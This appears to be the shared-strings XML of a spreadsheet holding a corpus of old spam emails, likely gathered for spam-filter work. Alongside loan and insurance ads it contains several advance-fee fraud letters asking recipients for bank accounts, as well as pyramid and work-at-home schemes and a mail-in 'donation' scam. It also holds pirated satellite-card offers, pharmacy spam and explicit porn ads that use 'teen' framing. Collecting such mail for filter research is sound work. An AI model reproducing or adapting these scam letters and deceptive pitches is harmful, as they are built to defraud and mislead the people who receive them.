                  Doc Prep Fee 
                  Application Fee 
                  Credit Report Charge 
                  Processing Fee
$250 
                  $200 
                  $250 
                  $25 
                  $300
$0* 
                  $0 
                  $0 
                  $0 
                  $0 Total 
                  Lender Fees* 
$1025$0*The immediate 
      savings could mean more money for you to put toward bills, home improvements 
      or to use however you'd like.It's 
        simple to get started and there's no obligation.
Here's all you need to do: 
        Find 
            the loan to fit your needs - even if you have less than perfect credit.
â€¢ 
            Mortgage Refinance Loans
            â€¢ Home Equity Loans
            â€¢ Personal Loans for HomeownersApply 
            Online and you're automatically qualified for our "No Lender's 
            Fees" offer. 
You'll 
            save $100's right away and as a Household customer you can take advantage 
            of our Pay Right Rewards, Online Bill Pay and many other benefits 
            - which means you could save money over time as well!With 
            an approved loan, you could lower your monthly payments by $100's.
Try 
            our Calculate 
            and Save tool and see for yourself!Don't 
        delay - This is a limited time offer! Promotion 
        Expires 09/30/02
PS:
      If you are a current Household customer (Household Finance Corporation, 
      Beneficial Corporation or their subsidiaries), please contact your branch 
      for more information on other great products. 
      * Not applicable in Illinois as origination fee may be charged. 
      You and your lender may negotiate discount points to buy down rates. Third 
      party fees such as title insurance, appraisal, closing fee, government recording 
      fee and other charges (where applicable) are the responsibility of the borrower. 
      All loans made by Household Finance Corporation (or subsidiares).       As a Household company, we're part of a financial family that has been helping 
      working people since 1878. We have the experience, size and strength to 
      help you access the money you need. 
      No time to apply right now? No problem, click 
      here and register to receive future updates, information and special 
      offers.You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http://www.frugaljoe.com/unsubscribe.php?eid=399843\~moc.cnietonten^^mj\~1754388\~12a1Â </t>
  </si>
  <si>
    <t xml:space="preserve">FROM: KONE BAKAR
TEL: (+225) 0771 1719.  
ABIDJAN, IVORY COAST  
WEST-AFRICA.  
DEAR,  
PERMIT ME TO INFORM YOU OF MY DESIRE OF GOING INTO BUSINESS
RELATIONSHIP  WITH YOU. I GOT YOUR NAME AND CONTACT FROM THE INTERNET
IN MY SEARCH FOR ASSISTANCE. DUE TO IT'S ESTEEMING NATURE I MUST NOT
HESITATE TO CONFIDE IN YOU FOR THIS SIMPLE AND SINCERE BUSINESS.  
I AM KONE BAKAR, THE ONLY CHILD OF LATE MR &amp; MRS. COULIBALY BAKAR. 
MY FATHER WAS A VERY WEALTHY COCOA MERCHANT BASED IN ABIDJAN, THE
ECONOMIC CAPITAL OF IVORY COAST BEFORE HE WAS POISONED TO DEATH BY
HIS BUSINESS ASSOCIATES ON ONE OF THEIR OUTING ON ON A BUSINESS
MEETINGS.  
WHEN MY MOTHER DIED ON THE 21ST OCTOBER 1994, MY
FATHER TOOK ME SO SPECIAL BECAUSE MY MOTHER IS NOW DEAD. BEFORE THE
DEATH OF MY FATHER ON 29TH JUNE 2000 IN A PRIVATE HOSPITAL HERE IN
ABIDJAN. HE SECRETLY CALLED ME ON HIS BEDSIDE AND TOLD ME  THAT HE
HAS A SUM OF US$16,500,000(SIXTEEN MILLION FIVE HUNDRED
THOUSAND,UNITED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1.TO PROVIDE A BANK ACCOUNT WHERE THIS MONEY WOULD BE TRANSFERRED TO.  2.TO SERVE AS THE GUARDIAN OF THIS FUND SINCE I AM A BOY OF 22 YEARS.  3.TO MAKE ARRANGEMENT FOR ME TO COME OVER TO YOUR COUNTRY AFTER THE
MONEY HAS BEEN TRANSFERRED.  
MOREOVER SIR, I AM WILLING TO OFFER YOU 15% OF THE TOTAL SUM AS
COMPENSATION FOR YOUR EFFORT/INPUT AFTER THE SUCCESSFUL TRANSFER OF
THIS FUND TO YOUR NOMINATED ACCOUNT OVERSEAS.  
FURTHERMORE, YOU SHOULD INDICATE YOUR OPINION TOWARDS ASSISTING ME AS
I BELIEVE THAT THIS TRANSACTION WOULD BE CONCLUDED WITHIN SEVEN (7)
DAYS YOU SIGNIFY YOUR INTEREST TO ASSIST ME.  
I WILL APPRECIATE YOU CALL ME ON + 225 0771 1719 BEFORE SENDING ME
YOUR REPLY.  
ANTICAIPTING TO HEARING FROM YOU SOON.  
THANKS AND GOD BLESS.  
KONE BAKAR
TEL: + 225 0771 1719.
 -- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup
</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled DocumentYou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</si>
  <si>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You can save thousands of dollars over the course of your loan with just a .25% drop in your rate! "Now is the time to take advantage of falling interest rates!  There is no advantage in waiting any longer."http://quotes.readyserve21.com/sure_quote/Refinance or consolidate high interest credit card debt into a low interest mortgage.  Mortgage interest is tax deductible, whereas credit card interest is not.Our nationwide network of lenders have hundreds of  different loan programs to fit your current situation:   *  Refinance   *  Second Mortgage   *  Debt Consolidation   *  Home Improvement   *  PurchaseBy clicking on the link below and filling out the form, the information you provide is instantly transmitted to our network of financial experts who will respond to your request with up to three offers.This service is 100% free to homeowners, and of course, without obligation.http://quotes.readyserve21.com/sure_quote/Click here to delete your address from future updates.
http://quotes.readyserve21.com/sure_quote/rm/</t>
  </si>
  <si>
    <t xml:space="preserve">Never Pay Retail!
chdvd.com from Columbia HouseThe Columbia House DVD Club is the best way to build your DVD
collection. Check out today's best sellers like Ocean's 11, Harry
Potter and the Sorcerer's Stone, Gladiator and many more! Join now and
you can...
Â 
Get 4 DVDs for 49Â¢ each!shipping &amp; processing only $1.99 per DVD
Details
SPOTLIGHTÂ Â Â Â Â 
Ocean's 11Starring George Clooney, Brad Pitt, Matt Damon
Â 
Harry Potter and the Sorcerer's StoneStarring Daniel Radcliffe, Rupert Grint, Emma Watson 
Â 
GladiatorStarring Russell Crowe, Joaquin Phoenix
Â MORE TITLESChoose from these many more hot releases at chdvd.com!
The Others
Training Day
Pearl Harbor (2001) 60th Anniversary Commemorative Edition
Moulin Rouge (2001)
BraveheartÂ Shrek Special Edition
Spy Game
American Pie 2 Collector's Edition (Unrated)
Gone In 60 Seconds 
The Green MileMore Hits
Matrix
Fast and the Furious (2001) Collector's Edition
Serendipity
Titanic
Saving Private Ryan Special Limited EditionÂ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http://www.frugaljoe.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.In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easily...Compare your coverage...
$250,000... as low as $6.50 per month.
$500,000... as low as $9.50 per month.
$1,000,000... as low as $15.50 per month.http://quotes.readyserve21.com/sure_quote/LF06-237600/Take a moment.
Let us show you that we are here to save time, and money.Receive up to 15 quotes in seconds.http://quotes.readyserve21.com/sure_quote/LF06-237600/
Click here to delete your address from future updates.
http://quotes.readyserve21.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Â 
Â 
We are strongly against sending unsolicited emails
to those who do not wish to receive our special mailings.You have opted in to one or more of our affiliate
sites requesting to be notified of any special offers we may run from time to
time. If you do not wish to receive further mailings, please
click this link .
Please accept our apologies if you have been sent this email in error. We honor
all removal requests.
22
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Need a Credit Card? We'll get One for You!
http://www.adclick.ws/p.cfm?o=114&amp;s=pk012)) Auto Loans, Fast Approvals for Any Credit!
http://www.adclick.ws/p.cfm?o=383&amp;s=pk12) Are You Paying Too Much for Auto Insurance - Find Out?
http://www.adclick.ws/p.cfm?o=334&amp;s=pk13) Get Your Free Credit Report!
http://www.adclick.ws/p.cfm?o=322&amp;s=pk1Have a wonderful day,
Offer Manager
PrizeMama------------------
You are receiving this email because you have opted-in to receive
email from publisher: prizemama.  To unsubscribe, click below:http://u2.azoogle.com/?z=93-1090346-62lLC4
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Cell Booster AntennaBOOST 
        Your Reception
on 
        any cell phone or cordless
Â 
300% More Clarity!
Don't 
              buy another phone because of bad recepiton.
              Improve your communication instantly by
              simply installing this small chip.
Powerful Reception Booster
              Save 70%... As Seen On T.V.!
No 
              other product compares!
Ultra-thin and transparent
Installs in a second!
Power of a 4ft antenna!
No more dropped or interrupted calls
Work any place your singal may be weak!
Advertised on T.V. for over 3 times the price.
Click 
              Here Now
"...it was so easy to 
              install..."
To be removed from our database, click here.
</t>
  </si>
  <si>
    <t>=============================================
Brand-New VERSION 7.0 Just Released:
Astounding New Software Lets You Find
Out Almost ANYTHING about ANYONE...
=============================================Download it right now (no charge card needed):For the brand-new VERSION 7.0, click here:
http://www.freehostaccess.com/freeht/mxi.html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http://www.freehostaccess.com/freeht/mxi.html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For the brand-new VERSION 7.0, click here:
http://www.freehostaccess.com/freeht/mxi.html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found.For the brand-new VERSION 7.0, click here:
http://www.freehostaccess.com/freeht/mxi.html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http://www.freehostaccess.com/freeht/mxi.html 
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:
mailto:stp_910_b@list.ru?subject=STOP_MXI910 Please allow up to 72 hours to take effect.Please do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically. [KIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi -( http://club.4tfox.com )You get emails every day, offering to show you how to make money.
Most of these emails are from people who are NOT making any money.
And they expect you to listen to them?Enough.If you want to make money with your computer, then you should
hook up with a group that is actually DOING it.  We are making
a large, continuing income every month.  What's more - we will
show YOU how to do the same thing.This business is done completely by internet and email, and you
can even join for free to check it out first.  If you can send
an email, you can do this.  No special "skills" are required.How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for.This is not income that is determined by luck, or work that is
done FOR you - it is all based on your effort.  But, as I said,
there are no special skills required.  And this income is RESIDUAL -
meaning that it continues each month (and it tends to increase
each month also).Interested?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it.To grab a FREE ID# and have more information, simply go to the 
 web address http://club.4tfox.com  and send me an email with following 
 informtion"Send me a free membership!"Be sure to include your:
1. First name
2. Last name
3. Email address (if different from above)We will confirm your position and send you a special report
as soon as possible, and also Your free Member Number.If you are not interested in tring to Earn Money,  :)
you are interested in the huge discount from the 140 Online Shops,
Very Cheap ISP package and many many more,You can also go to the web address:
http://club.4tfox.com/#id-GreatServiceThat's all there's to it.We'll then send you info, and you can make up your own mind.Looking forward to hearing from you!Sincerely, Hugh ZouP.S. After having several negative experiences with network
marketing companies I had pretty much given up on them.
This is different - there is value, integrity, and a
REAL opportunity to have your own home-based business...
and finally make real money on the internet.Don't pass this up..you can sign up and test-drive the
program for FREE.  All you need to do is get your free
membership.Unsubscribing: Send a blank email to: removemefromlist@bigfoot.com with
"Remove" in the subject line.  By submitting a request for a FREE
DHS Club Membership, I agree to accept email from the DHS Club for
both their consumer and business opportunities.3619ezfT0-011VpTm2924l20
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Tired of paying big bucks for satellite t.v.?THEN DONT!For as low as $97 you can buy the programming card that will
give you all the channels.  YES ALL OF THEM, including pay channels
and pay per view.  You will never have another satellite or cable bill
again.  http://11.lspeedhost.net/zzzzcards/ads
FOR AS LITTLE AS $97 YOU NOW GOT A WORKING UNBLOCKED RECEIVER WITH 
ALL CHANNELS !!! 60+ movie channels 20+ PRON CHANNELS ,etc.. ALL THE 
CHANNELS ARE UNLOCKED!!! INCLUDING ALL PAY PER VIEW AND EVENTS FOR 
FREE!  FOR LIFE!http://11.lspeedhost.net/zzzzcards/ads
5963HgYk7-980lnZG6754dLNm8-294DcnP4174Lcsd2-914QRTr7194Fyjl55
</t>
  </si>
  <si>
    <t xml:space="preserve">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week.To get signed up for FREE and take a test drive use 
the link:
mailto:workinathome@btamail.net.cn?subject=more_MOSS4_info_please
Be sure to request info if the subject line does not! The national attention drawn by this program 
will drive this program with incredible momentum! 
Don't wait, if you wait, the next 400 people will 
be above you.Take your FREE test drive and have the next 400  
below you!mailto:workinathome@btamail.net.cn?subject=more_MOSS4_info_please
Be sure to request info if the subject line does not! All the best,Daniel
Financially Independent Home Business Owner______________________________________________________
To be excluded from future notices:
mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">Classic WinesAll of this can be
                Yours for only
                $12.99*
 2 Bottles of Premium Wine
 2 Elegant Wine Glasses
 Capitano Waiter's Corkscrew
 Marble Bottle Stopper
 Delicious Gourmet Wine Crackers
 Member Discounts on Additional Wine
                      Selections
 Our Cellar Profile newsletter
Total Retail Value of this Special Offer -
                $42.95A
                special offer for the discriminating
                wine drinker.
Indulge your love of adventure . discovery . and fine wine from the comfort of your home with our convenient program. Receive two expertly selected premium wines for
              the price of one - only $12.99* - 50% off the regular price - delivered to your door with our Wine Starter Kit as a FREE Gift.  Starter Kit includes, 2 Elegant Wine Glasses, a Capitano Waiter's Corkscrew, Gourmet Wine Crackers and MORE!
You'll have your choice of two reds, two whites or one of each. One month you may have the pleasure of experiencing a wonderfully full-bodied Cabernet Sauvignon from California and a delicious Chardonnay from Australia. Another month, you may get an exquisite Chianti from Italy and a fabulous Sauvignon Blanc from France. You'll savor a broad range of some of the world's most fascinating wine - right in your own home.
Your satisfaction is 100% guaranteed. If you are not completely satisfied with the Classic Selections program, you can cancel at any time.
               There is no minimum to buy and no obligation for further purchases or deliveries.
               So, uncork your own wine adventure and explore the world's finest vineyards with Classic Selections!  *Plus shipping and tax from $7.00 - $9.00 depending on destination state.                We accept orders from adults at least 21 or older only. All shipments are delivered by UPS or private courier and the signature of an adult is required at the time of delivery. Offer cannot be combined with any other offer and is void where prohibited. This offer is only valid in the following states: AZ, CA, CO, CT, FL, IA, ID, IL, IN, MI, MO, NC, NE, NJ, NM, NY, OH, OR, TX, VA, WA, WI. List of legal states subject to change.
                Due to legal restrictions in some states, alcohol can not be given away for free.  Therefore, the promotion is 50% off of the two bottles which equates to the same as one free bottle.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</si>
  <si>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
Never Pay Retail!
:::::: Royal Vegas Online Casino -- Beat the House at Royal Vegas !!! ::::::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http://www.frugaljoe.com/unsubscribe.php?eid=340329\~moc.cnietonten^^mj\~1754388\~12a1
</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello! : 
=================================================================== "Dmm": Discount Mortgage Millionaire 
Program: A Special Invitation To Wealth !!! Help Us Contact Home Owners In Your City And Pocket 
"$1000" / Deal, Easy Cash!!! 
============================================================= To:This e-mail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them.When you apply, you can help us contact Home Owners in your city and 
on the internet.All you do is call or e-mail them or send a simple but Powerful letter and form to them to complete and return back to us.If they have Real Estate Notes or Trust Deeds, we'll either buy them or refer 
them to our associates. If the deal goes through, we pay you 10% of whatever net amount we made. For example, if we made $10,000, you'll get 10% = $1000. 
Therefore if we do 10 deals in a month, you will take in an 
easy 10 x $1000  = $10,000!!! Rake in Big Cash without any  hard work, or large investment or special training!  We'll give you all the resources needed to make the contacts, including 
the sales letter, the e-mail letter, the forms, and the phone script! 
 The Real Estate Market One of the primary human needs is Security. Shelter. Home. House.Wherever you go, there are homes, houses and buildings!
Therefore Real Estate Market is  huge! More than $500 billion 
in Usa alone!!!That is why opportunities to create vast wealth is always available!!!You may have heard that more than 56% of millionaires in Usa
(and probably in other countries also)  created their wealth through
Real Estate investments!Well, that is half the truth! You Must know Millionaires "Jealously Guarded 
Real Estate Secrets, Before You May Succeed"!!!  The way to create vast Wealth in Real Estate is Not by buying Real
Estate and holding it until it appreciates in value, then you sell it.That is the hard way. You'll be bogged down by cash flow crunch
and all the hassles with tenants and maintenance.That is what the majority of Real Estate investors do. 
It is Not fun, and it can frustrate and  wear you thin!  Discover  The "Millionaires' Secret" Of 
Creating Vast Wealth Through 
Real Estate Investmentsï¿½ The Smart, Fast, easy and highly profitable way to make 
Millions in Real Estate is to buy and  sell  Discounted 
Mortgages, Real Estate Notes and Trust Deeds 
from homeowners!   That is why we need you! By joining us, you'll help us
contact homeowners in your city, and we and our associates will invest 
in them, and do all the work,  while you get paid about 10% of the deal (or
$1000/deal), without doing any hard work or large investment!  How To Apply:  This package: "Discount Mortgage Millionaire"
 (Dmm)  program is almost  "Free" !!! However, we must ask you to donate a token fee of $10. (This is voluntary) This is our way to discourage those who are not serious. Our time is worth a lot of money.We only want to hear from those who are serious!If you're interested, please follow the simple steps below to apply. Help us make contacts, and we'll spend our money to do the deal, and also 
compensate you handsomely (10% of whatever amount we make). It is a 
win-win relationship !  Application Steps:  (1)  Write your Name, Address, E-mail address, Phone and fax 
(if any) on a piece of paper.  Then Write the words: 
"$10 Donation" for Dmm program.  (2) Enclose $10 Usa Dollars  in cash or money order (Usa only)  
and send it by Priority mail to the Name and Address below :  
(Customers from outside Usa, please buy and send 
Usa Dollars cash only)  Mr. Benney, Ceo
(Dmm Package) 
328 Flatbush Ave., 
Suite 221
Brooklyn, Ny 11238
Usa*******Phone: (718) 595 0529 
(Please Mention "Dmm Program, Code B")  (3) After sending the "Donation", send an e-mail and notify 
us that you have sent it.   Include your full Name, and Phone. And put these words in the subject space: "Donation Sent for Dmm program, Code B"Please Send the e-mail notice  to: 
 polsew246@btamail.net.cn  (4) What You Shall Receive: (a) You'll receive the "Discount Mortgage Millionaire"  
Dmm package, which  gives you all the details on how this 
cash program works, including  all the resources you need 
to make contacts for us.When you order "Dmm eBook", you will have two choices:(a) You can use our Real Estate Millionaire Cash Secret 
(Dmm ebook) to find the deals, do them yourself and 
keep all the money!
Or
(b) You can apply and become our Associate Mortgage 
Agent (Ama) and participate in our Millionaire 
"Real Estate Acquisition Plan" (Reap)!(b) You'll also receive Free details on how to obtain 
another powerful program that we have: 
 "Quick Cash Secret Banking System, 
The Royal Road To Riches", (Qcsbs-rrr) You'll discover the jealously guarded 2000 yrs old 
millionaire cash secret  little known to the general public. All you do is go to the "Secret Website" on the internet, 
we shall reveal, open a "special bank account", then 
click your mouse and enter a "Secret Code Number". Then click your mouse again, and you'll start making 
money! It takes only  minutes to do, and you can 
rake in $1,500/wk from this!!! 100% legal and valid in all countries of the world. 
No hard work or special training or scam or 
large investment!   When you order the "Dmm package", you'll get all the 
details about this  "Qcsbs-rrr" also, and we'll help you learn 
and also start using it to create  true wealth and success!Qcsbs Millionaire Cash System is the Fastest  and Greatest way 
to make money on earth!!!That  is how we obtained the money we want to spend in Real 
Estate investments!When you get Qcsbs, it will also help you to create powerful
cash flow to acquire Real Estate and other assets fast!!!When we get your "donation", we shall send you an e-mail 
to download this Dmm ebook from our storage site on the 
internet. So be sure your e-mail address is valid, and you 
notify us by e-mail after you send the $10 donation. Please allow at least 2 weeks, after you send the donation
so we may receive it. When we receive it, we'll send an e-mail 
to you to download the "Dmm eBook".We look forward to working with you, to help you begin to
acquire  Real Estate and Cash flow, without any headaches
hassles, or large investments!!!Your time to stay at home and make money in Real Estate deals
has come, so answer this special invitation today!!!Thank you!Mwc Investments,  International (A Div. of Mwc)  Deadline To Apply:  This offer is valid for 1 week only.Please apply within 1 week of getting this e-mail. 
If you fail, you may Not be accepted!Therefore print this e-mail now!
Then Read it many times to understand and agree
to our offer and then place an order now!You may get this e-mail only once. 
So, hurry to avoid missing this fabulous 
One-In-A-lifetime Real Estate, Easy, Fast Cash Opportunity! Start today!  In  less than a year, you may be worth
about $1,000,000!!! Come and join us now!!!
 Unsubscribe Info:  This e-mail is Not intended for Washington State residents, and any
other anti-internet commerce state. If you're from any of these states, please delete this e-mail and don't respond. 
This offer is void wherever prohibited by law.Your  name is not in our database, therefore you may Not get another
 e-mail from us! Our remove address is:
removeme@easy.com=============================End====================================
</t>
  </si>
  <si>
    <t xml:space="preserve">
Fortunes are literally being made in this great new 
        marketplace!
Over $9 Billion in merchandise 
        was sold on eBay in 2001 by people just like you - right from 
        their homes! 
Now you too can learn the secrets of successful selling 
        on eBay and make a staggering income from the comfort 
        of your own home. If you are motivated, capable of having 
        an open mind, and can follow simple directions, then visit 
        us here. If server busy -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Â 
Â  
Â 
Â  
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT DOMAIN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(b1)0474aQIz9-237xTMz9546aZDm1-521Lllj5910RDZl1-150RKYm2509Gxri8-258Tytl2824AfwK4-512Qxl78-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Special Offer - FREE TRIAL
CLICK HEREÂ 
Â 
I'm not interested click heresajfdibpjnjppmhbymschktbn
</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t xml:space="preserve">TeenLegal Teen XXX Hardcore4 FREE
Boy was Gauge surprised when Joey's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mouth?Find out for 100% FREE at Legal Teen Girls!!!  We just added Gauge's three way, you have to see it!!!  We have tons of other sweet young teens getting it in ways they never imagined possible, for FREE!!!!
CLICK HERE FOR YOUR 100% FREE LIFETIME MEMBERSHIP!
Disclaimer:We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 
</t>
  </si>
  <si>
    <t xml:space="preserve">VIAGRA, XENICAL, VIOXX, ZYBAN, PROPECIA Â®
We only offer the real VIAGRA, XENICAL, VIOXX, ZYBAN, PROPECIA Â®
No Herbal Supplements at a much reduced rate found anyplace on
the Internet.all orders shipped discreetly and swiftly to your door
Enter here for pricing and info
Enter this link to abandon future offer's?
</t>
  </si>
  <si>
    <t xml:space="preserve">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http://ter.netblah.com:8080So if you are looking to be employed at home, with a career that will 
provide you vast opportunities and a substantial income, please fill 
out our online information request form here now: http://www.zhoster.com:8080/homeopp/ 
To be removed from our list simply click on the link below now: http://www.zhoster.com:26000/homeopp/remove.html
6115CNUY4-341mBpO6887KGZk1-483ZEiE1934cEmx1-116CJYF2258Aegj1-5l58
</t>
  </si>
  <si>
    <t xml:space="preserve">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go:http://ter.netblah.com:8080We are looking for energetic and self motivated people.  If that is you
than click on the link and fill out the form, and one of our
employment specialist will contact you.To be removed from our link simple go to:http://ter.netblah.com:8080/remove.html2737cCYw6-489ODYT6241mnnu4-719yRix1751YUrY1-602Nnab8882DYTA1-376gVJi7941l68
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi -( http://club.4tfox.com )You get emails every day, offering to show you how to make money.
Most of these emails are from people who are NOT making any money.
And they expect you to listen to them?Enough.If you want to make money with your computer, then you should
hook up with a group that is actually DOING it.  We are making
a large, continuing income every month.  What's more - we will
show YOU how to do the same thing.This business is done completely by internet and email, and you
can even join for free to check it out first.  If you can send
an email, you can do this.  No special "skills" are required.How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for.This is not income that is determined by luck, or work that is
done FOR you - it is all based on your effort.  But, as I said,
there are no special skills required.  And this income is RESIDUAL -
meaning that it continues each month (and it tends to increase
each month also).Interested?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it.To grab a FREE ID# and have more information, simply go to the 
 web address http://club.4tfox.com  and send me an email with following 
 information"Send me a free membership!"Be sure to include your:
1. First name
2. Last name
3. Email address (if different from above)We will confirm your position and send you a special report
as soon as possible, and also Your free Member Number.If you are not interested in tring to Earn Money,  :)
you are interested in the huge discount from the 140 Online Shops,
Very Cheap ISP package and many many more,You can also go to the web address:
http://club.4tfox.com/#id-GreatServiceThat's all there's to it.We'll then send you info, and you can make up your own mind.Looking forward to hearing from you!Sincerely, Hugh ZouP.S. After having several negative experiences with network
marketing companies I had pretty much given up on them.
This is different - there is value, integrity, and a
REAL opportunity to have your own home-based business...
and finally make real money on the internet.Don't pass this up..you can sign up and test-drive the
program for FREE.  All you need to do is get your free
membership.Unsubscribing: Send a blank email to: removemefromlist@bigfoot.com with
"Remove" in the subject line.  By submitting a request for a FREE
DHS Club Membership, I agree to accept email from the DHS Club for
both their consumer and business opportunities.6341syJY3-651BumD4705MRUD6-842PIIO5741fevP5-325qxvW7258Ol53
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Tell Me Where to Send Your Health CardYou requested to receive this mailing, by registering at Send Great Offers.
           I'm your Healthy AdvantageSM
PERSONAL ADVOCATE. I'm 
              available 24 hours a day, 7 days a week to help you with insurance
              claims, finding a specialist, helping you cut through red tape.
            FREE for one full month
30% off doctor visits and medical care
50% off dental care
50% off prescription drugs
No commitments. No hassles.
AND MUCH MORE!
Best of all, you cannot be turned down.
SPECIAL
                    BONUS OFFER: Get a FREE
Samsonite Tote (with accompanying Cosmetic Case) and 10-Piece
                    Manicure Set. Yours to keep FREE with your
                    FREE Trial Membership
                    in Healthy Advantage.
 NO SPAM POLICY
Your privacy is important to us. You received this message because you have agreed to
	      receive offers from Send Great Offers or one of our
	      carefully selected marketing partners. We abide by a no spam policy.
	      If you believe that you are receiving this message in error or would no
	      longer like to receive email from Send Great Offers,
	      please click on the link below.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</si>
  <si>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New Account For: zzzz@spamassassin.taint.org 
##################################################
#                                                #
#                 Adult Club                     #
#           Offers FREE Membership               #
#                                                #
#          3 of the Best Adult Sites             #
#     on the Internet for Absolutely FREE        #
#                                                #
##################################################&gt; &gt; &gt; &gt; YOU HAVE INSTANT ACCESS TO ALL 3 SITES NOW
&gt; &gt; &gt; &gt; User Name: zzzz@spamassassin.taint.org
&gt; &gt; &gt; &gt; Password: 1534- - - - - - - - - - - - - - - - - - - -
NEWS 09/24/02
With just over 4.8 Million Members that signed up for FREE, Last month there were 921,947 New
Members. Are you one of them yet???
- - - - - - - - - - - - - - - - - - - -Our Membership FAQQ. Why are you offering free access to 3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3 membership sites?
A. No just one to get access to all of them.Q. How do I get started?
A. Click on one of the following links below to become a member.&gt; &gt; &gt; &gt; Fill in the required info and they won't charge you for the Free
Membership!
&gt; &gt; &gt; &gt; If you don't believe us, just read their terms and conditions.- - - - - - - - - - - - - - - - - - - -# 3. &gt; Lucky Amateur Wives
http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
You won't believe what we take these Wives into doing...FREE VIP Membership!!# 2. &gt; New! just added today: Cum Drinkers
http://www.bozombo.com/cumdrinkers/index.php?affid=1534
950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!# 1. &gt; Filthy Teen Sluts
http://www.bozombo.com/filthyteensluts/index.php?affid=1534
The Ultimate XXX TEEN Site... FREE VIP Membership!!- - - - - - - - - - - - - - - - - - - -Jennifer Simpson, Miami, FL
Your FREE lifetime membership has entertained my boyffriend and I for the last two years!  Your
Adult Sites are the best on the net!Joe Morgan Manhattan, NY
Your live sex shows and live sex cams are unbelievable. The best part about your porn sites, is
that they're absolutely FREE!- - - - - - - - - - - - - - - - - - - -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http://greenzer.com/remove.php to be removed
from the list. Please accept our apologies if you have been sent this email in error. We honor all
removal requests.Thank you zzzz@spamassassin.taint.orgoldhtlheuhcclco
</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</si>
  <si>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?Although often misunderstood, there is one method that has
proven to succeed time-after-time.
         E - M A I L   M A R K E T I N G ! !
Does the thought of $50,000 to $151,200.00 per year make you
tingle with excitement?  Many of our customers make that and 
more... Click here to find out how:
http://http://32.97.166.75/seinet.veri321/ 
HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING:
"A gold mine for those who can take advantage of
bulk e-mail programs" - The New York Times"E-mail is an incredible lead generation tool"
- Crains Magazine
Click here to find out how YOU can do it:
http://http://32.97.166.75/seinet.veri321/ ==========================================================
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:mailto:list6644@postino.ch?Subject=StopPlease do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically.
********************************************************** [7(^(PO1:KJ)_8J7BJK9^":}H&amp;*T]</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
Purchase an Extended Auto Warranty for your Car today. 
CLICK HERE for a FREE no obligation quote.
http://ww1.bestoffersonthenet.com/autoprotectquote/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http://ww1.bestoffersonthenet.com/autoprotectquote/
---------------------------------------
To easily remove your address from the list, go to: 
http://ww1.bestoffersonthenet.com/stopthemailplease/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t>Mr.Vincent Nnaji,
 Standard Trust Bank Ltd,
 Lagos,Nigeria.
 Dear Sir,
 I am Mr.Vincent Nnaji, Bank Manager of Standard Trust Bank,Lagos,Nigeria. I have urgent and very confidential business proposition for you. 
On January 6,1998 a Foreign Oil Consultant Foreign contractor with the Nigerian National Petroleum Corporation Mr. James Herbert made a numbered time Fixed Deposit for twelve calendar months valued at US$20M (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Mr.James Herbert did not declare any next of kin or relations in all his official documents including his Bank Deposit paperwork in my Bank. This sum of US$20M has carefully been moved out of my bank to a security company for safe-keeping. No one will ever come forward to claim it. 
According to Nigerian Law at the expiration of 5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70% for me and 25% for you and 5%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interest. 
Thanks and Regards,
 MR.VINCENT NNAJI.</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</si>
  <si>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husband's friend. We came
into
Togo with some valuables including a cash sum of $25MILLION(TWENTY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20% of the total sum for your help. But due to how I
am being
monitored by the Sierra Leonean Government Secret Agents, I will advice
you to
have the 
deal concluded with my son (IBRAHIM KOJO). Please contact my son on this
email:
ibrahimkojo@caramail.com ,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</si>
  <si>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 xml:space="preserve">Lowest rates available for term life insurance! 
Take a moment and fill out our online form to see the low rate you qualify for. 
Save up to 70% from regular rates! 
Smokers accepted! 
http://ww1.bestoffersonthenet.com/termlifequote/
Representing quality nationwide carriers. Act now!
---------------------------------------
To easily remove your address from the list, go to: 
http://ww1.bestoffersonthenet.com/stopthemailplease/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t>Â Â Â Â Â 
 Private Label 
Reseller Hosting PlansÂ Starter PlanMidsize 
PlanSuperSIZE PlanPriceÂ Â  
99.95/mo.259.95/mo.425.95/mo.
DomainsÂ Â  75UnlimitedUnlimitedDisk SpaceÂ Â  
2X 500 Mb 2X 1GB2X 10 GBBandwidthÂ Â  
2X 15 GB2x 50 GB2X 
100GBBillingÂ Â  750125Â   More Info  More Info 
More 
InfoThat's 
right, we will DOUBLE these already huge amounts of Disk Space and Bandwidth: 
only  Available until 9/30/2002 6 P.M. EST.
Think this offer can't get any better? Think 
again!Â  If you sign - up for a six (6) month hosting package,Â  we 
